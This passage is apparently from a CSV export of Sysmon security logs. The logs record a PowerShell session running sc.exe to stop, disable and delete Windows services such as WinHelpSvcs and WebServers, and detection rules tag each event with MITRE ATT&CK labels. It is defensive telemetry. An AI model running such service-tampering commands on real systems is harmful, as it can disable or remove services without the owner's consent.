\""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:31.330"",""processGuid"":""{df9fc3d3-b3d3-5ecf-0000-0010d3722b00}"",""processId"":""984"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop aspnet_staters"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:59.146",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:31.134 +ProcessGuid: {df9fc3d3-b3d3-5ecf-0000-0010dd6d2b00} +ProcessId: 8056 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelpSvcs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:31.152121600Z"",""eventRecordID"":""3246"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:31.134\r\nProcessGuid: {df9fc3d3-b3d3-5ecf-0000-0010dd6d2b00}\r\nProcessId: 8056\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:31.134"",""processGuid"":""{df9fc3d3-b3d3-5ecf-0000-0010dd6d2b00}"",""processId"":""8056"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelpSvcs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:59.127",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:31.104 +ProcessGuid: {df9fc3d3-b3d3-5ecf-0000-0010d76c2b00} +ProcessId: 7644 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WinHelpSvcs Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinHelpSvcs Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:31.115759500Z"",""eventRecordID"":""3245"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:31.104\r\nProcessGuid: {df9fc3d3-b3d3-5ecf-0000-0010d76c2b00}\r\nProcessId: 7644\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinHelpSvcs Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:31.104"",""processGuid"":""{df9fc3d3-b3d3-5ecf-0000-0010d76c2b00}"",""processId"":""7644"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinHelpSvcs Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:59.091",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:31.062 +ProcessGuid: {df9fc3d3-b3d3-5ecf-0000-0010256b2b00} +ProcessId: 5664 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WWW.DDOS.CN.COM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:31.067751000Z"",""eventRecordID"":""3243"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:31.062\r\nProcessGuid: {df9fc3d3-b3d3-5ecf-0000-0010256b2b00}\r\nProcessId: 5664\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:31.062"",""processGuid"":""{df9fc3d3-b3d3-5ecf-0000-0010256b2b00}"",""processId"":""5664"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WWW.DDOS.CN.COM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:59.002",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:30.990 +ProcessGuid: {df9fc3d3-b3d2-5ecf-0000-001069682b00} +ProcessId: 6556 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ExpressVNService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:30.996476800Z"",""eventRecordID"":""3240"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:30.990\r\nProcessGuid: {df9fc3d3-b3d2-5ecf-0000-001069682b00}\r\nProcessId: 6556\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:30.990"",""processGuid"":""{df9fc3d3-b3d2-5ecf-0000-001069682b00}"",""processId"":""6556"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ExpressVNService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.969",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:30.919 +ProcessGuid: {df9fc3d3-b3d2-5ecf-0000-001072662b00} +ProcessId: 3460 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WebServers +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WebServers",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:30.930569200Z"",""eventRecordID"":""3238"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:30.919\r\nProcessGuid: {df9fc3d3-b3d2-5ecf-0000-001072662b00}\r\nProcessId: 3460\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WebServers\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:30.919"",""processGuid"":""{df9fc3d3-b3d2-5ecf-0000-001072662b00}"",""processId"":""3460"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WebServers"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.966",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:30.875 +ProcessGuid: {df9fc3d3-b3d2-5ecf-0000-001094652b00} +ProcessId: 6716 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WebServers +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WebServers",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:30.884597000Z"",""eventRecordID"":""3237"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:30.875\r\nProcessGuid: {df9fc3d3-b3d2-5ecf-0000-001094652b00}\r\nProcessId: 6716\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WebServers\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 